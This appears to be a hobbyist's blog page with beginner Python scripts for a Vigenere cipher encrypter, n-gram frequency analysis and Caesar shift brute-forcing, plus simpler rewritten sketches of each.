# Created:     17/07/2012
# Copyright:   (c) James 2012
# Licence:     Open Source
#Creates the base Alphabet which is used for finding preceeding characters from the ciphertext.
baseAlphabet = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z')
print ("Welcome to a Vigenere Cipher encrypter. You will first be asked to enter the plain text to be encrypted and then the key you would like to use in the encryption process. The resulting text will be the cipher text.")
plainText = raw_input("Please enter the plain text")
key = raw_input("Please enter the key")
keyList = []
keyLength = 0
while keyLength < len(plainText):
    for char in key:#Adds the users entered key into a list character by character. Also makes the key the same length as plainText
        if keyLength < len(plainText):
            keyList.append(char)
            keyLength = keyLength + 1
completeCipherText = [] #The variable each processed letter is appended to
cipherCharIndexValue = 0#This is the value used to temporaily store the ciphertext character during the iteration
keyIncrement = 0
for plainTextChar in plainText: #Iterates through the plain text
    cipherCharIndexValue = baseAlphabet.index(keyList[keyIncrement]) + baseAlphabet.index(plainTextChar) #Adds the base alphabet index values of the key char and the plain text char
    while cipherCharIndexValue > 25:
        cipherCharIndexValue = cipherCharIndexValue - 26 #Brings the sum under 26 so it does not go out of range of the baseAlphabet tuple
    completeCipherText.append(baseAlphabet[cipherCharIndexValue]) #Appends the ciphertext character to completeCipherText. The character is found at index of the key char + index of plainTextChar in baseAlphabet
    keyIncrement = keyIncrement + 1 #Moves on to the next key character
print ''.join(completeCipherText) #Joins the result into a string for printing to the console.
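
The addition step described above can also be written with the modulo operator instead of the subtraction loop. The following is only a minimal sketch, not the program above: the names vigenere_encrypt and ALPHABET are made up for illustration, it is written for Python 3, and like the original it assumes the plain text and key contain only lowercase letters.

```python
import string

ALPHABET = string.ascii_lowercase  # 'a'..'z', same order as baseAlphabet


def vigenere_encrypt(plain_text, key):
    """Encrypt lowercase letters with a Vigenere cipher (hypothetical helper)."""
    cipher_chars = []
    for position, plain_char in enumerate(plain_text):
        key_char = key[position % len(key)]  # repeat the key along the text
        total = ALPHABET.index(key_char) + ALPHABET.index(plain_char)
        cipher_chars.append(ALPHABET[total % 26])  # wrap around past 'z'
    return "".join(cipher_chars)


# Key letter r (17) plus plain text letter p (15) gives 32, and 32 - 26 = 6, which is g.
print(vigenere_encrypt("p", "r"))
```

Using position % len(key) removes the need to build a key list the same length as the plain text first.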

Frequency Analysis with Python

Frequency analysis is commonly used in cryptanalysis of classical ciphers as a step in deducing the plain text from the cipher text. It works on the principle that certain letters appear more frequently on average than others. For example, “E” and “T” are the most common letters in English. This means that in a monoalphabetic cipher the most common letter found during frequency analysis is likely to stand for one of the common letters of the English language.
Frequency analysis works better the larger the text being analysed. In a short sentence a handful of less common letters can easily skew the results.
This script allows for analysis of single letters or of groups of letters known as n-grams. This is useful because common English letter pairs like TH and ER can be matched to the most frequent letter pairs in the analysed cipher text.

This is my second Python program. You enter some cipher text at the prompt, then choose the n-gram size you want to analyse and press enter. The program prints the n-grams it finds along with their number of occurrences, ordered from most to least frequent.

# Name:        Frequency Analysis
# Purpose:     Count the amount of n-grams in ciphertext
# Author:      James Woolley
# Created:     28/06/2012
# Copyright:   (c) James 2012
# Licence:     Open Source
inputText = str(raw_input("Please enter the cipher text to be analysed:")).replace(" ", "") #Input used to enter the cipher text. replace used to strip whitespace.
ngramDict = {}
highestValue = 0
def ngram(n): #Function used to populate ngramDict with n-grams. The argument is the amount of characters per n-gram.
    count = 0
    for letter in inputText:
        if str(inputText[count : count + n]) in ngramDict: #Check if the current n-gram is in ngramDict
            ngramDict[str(inputText[count : count + n])] = ngramDict[str(inputText[count : count + n])] + 1 #increments its value by 1
        else:
            ngramDict[str(inputText[count : count + n])] = 1 #Adds the n-gram and assigns it the value 1
        count = count + 1
    for bigram in list(ngramDict.keys()): #Iterates over a copy of the n-gram dict keys and removes any which are shorter than n (the partial n-grams from the end of the text)
        if len(bigram) < n:
            del ngramDict[bigram]
ngram(int(raw_input("Please enter the n-gram value. (eg bigrams = 2 trigrams = 3)")))
ngramList = [ (v,k) for k,v in ngramDict.iteritems() ] #iterates through the ngramDict. Swaps the keys and values and places them in a tuple which is in a list to be sorted.
ngramList.sort(reverse=True) #Sorts the list by the value of the tuple
for v,k in ngramList: #Iterates through the list and prints the ngram along with the amount of occurrences
    print("There are " + str(v) + " " + str(k))
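
For comparison, the same counting can be sketched with collections.Counter from the standard library. This is a hedged alternative and not the script above: count_ngrams is a made-up name, the sample text is only an illustration, and the code is written for Python 3.

```python
from collections import Counter


def count_ngrams(text, n):
    """Return a Counter of every run of n consecutive characters (hypothetical helper)."""
    text = text.replace(" ", "")  # strip spaces, as the script above does
    # Stop at len(text) - n + 1 so only full-length n-grams are produced.
    return Counter(text[i:i + n] for i in range(len(text) - n + 1))


# Print the three most frequent bigrams of a short sample text.
for ngram, occurrences in count_ngrams("the then there", 2).most_common(3):
    print("There are " + str(occurrences) + " " + ngram)
```

Because the range stops before the end of the text, no short n-grams are created and nothing has to be deleted afterwards. most_common() returns the entries ordered from most to least frequent.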

Cracking the Caesar Shift Cipher with Python

I recently started learning Python and have created a small script which can encrypt or decrypt plaintext or cipher text from a Caesar Shift Cipher. It’s nothing special but I’m curious as to how much easier it can be accomplished. I’m sure my method is very long winded and substantially more complicated than it needs to be.

Update: the script originally did not work with spaces. It now does.

# Name:        Caesar Shift Cipher
# Purpose:      Example code for analysing shifts on plain text by a Caesar shift cipher.
# Author:      James Woolley
# Created:     14/06/2012
# Copyright:   Open Source
#Creates the base alphabet which is used for finding preceding characters from the ciphertext.
baseAlphabet = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z')
print ("Welcome to a python Caesar shift cipher analyser. You will first be asked to enter the cipher text to be decrypted and then the amount of shifts you want to perform. Entering ALL for the shift amount will iterate through all 26 combinations.")
cipherText = raw_input("Please enter the Cipher text")
shiftAmount = raw_input("Please enter the shift amount. Enter ALL for brute force shifting.")
if shiftAmount.lower() == "all": #Accepts ALL in any letter case
    shiftAmount = "all"
else:
    shiftAmount = int(shiftAmount)
baseLetterIndex = 0
completePlainText = [] #The variable each processed letter is appended to
def shiftAndStore(shift):
    for increment in cipherText:
        for value in baseAlphabet:
            if value == increment:
                while shift + baseAlphabet.index(value) >= 26: #Checks if the shift would run past the 26 letters of the alphabet.
                    shift = shift - 26 #If so, 26 is subtracted until the shift plus the base alphabet index is lower than 26.
                baseLetterIndex = baseAlphabet.index(value) + shift #Assigns the index value of the processed letter to the baseLetterIndex variable.
                completePlainText.append(baseAlphabet[baseLetterIndex]) #Appends the processed letter to the completePlainText variable.
            if increment == (" "): #Handles spaces. Temporarily makes the value of increment X to prevent the space being appended 26 times.
                completePlainText.append(" ")
                increment = ("X")

if shiftAmount == "all": #Checks whether the user selected the brute force method or a specific shift value.
    shiftAmount = int(0)
    while shiftAmount < 26: #Iterates through all 26 combinations producing a processed value each time.
        shiftAndStore(shiftAmount)
        shiftAmount = shiftAmount + 1
        print "The Encoded / Decoded text on shift  " + str(shiftAmount - 1) + " is " + (''.join(completePlainText)) #Prints the shift amount and processed text.
        completePlainText = []
else: #Executed if specific shift value is chosen and not brute force.
    shiftAndStore(shiftAmount)
    print "The Shift Amount is " + str(shiftAmount)
    print "The Encoded / Decoded text is " + (''.join(completePlainText))
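
On the question of how much easier this can be done, one possible shorter version is sketched below. It is only an illustration under a few assumptions: the names caesar_shift and brute_force are made up, the code is written for Python 3, and unlike the script above it passes every non-letter character through unchanged rather than only handling spaces.

```python
import string

ALPHABET = string.ascii_lowercase


def caesar_shift(text, shift):
    """Shift each lowercase letter by `shift` places; other characters pass through."""
    shifted = []
    for char in text:
        if char in ALPHABET:
            # The modulo wraps the index around instead of subtracting 26 in a loop.
            shifted.append(ALPHABET[(ALPHABET.index(char) + shift) % 26])
        else:
            shifted.append(char)  # spaces, digits and punctuation are left unchanged
    return "".join(shifted)


def brute_force(cipher_text):
    """Return all 26 candidate shifts as (shift, text) pairs."""
    return [(shift, caesar_shift(cipher_text, shift)) for shift in range(26)]


# Try every shift on a sample cipher text and print each candidate.
for shift, candidate in brute_force("khoor zruog"):
    print("Shift " + str(shift) + ": " + candidate)
```

Returning the shifted text from a function, instead of appending to a shared list, means nothing has to be reset between shifts.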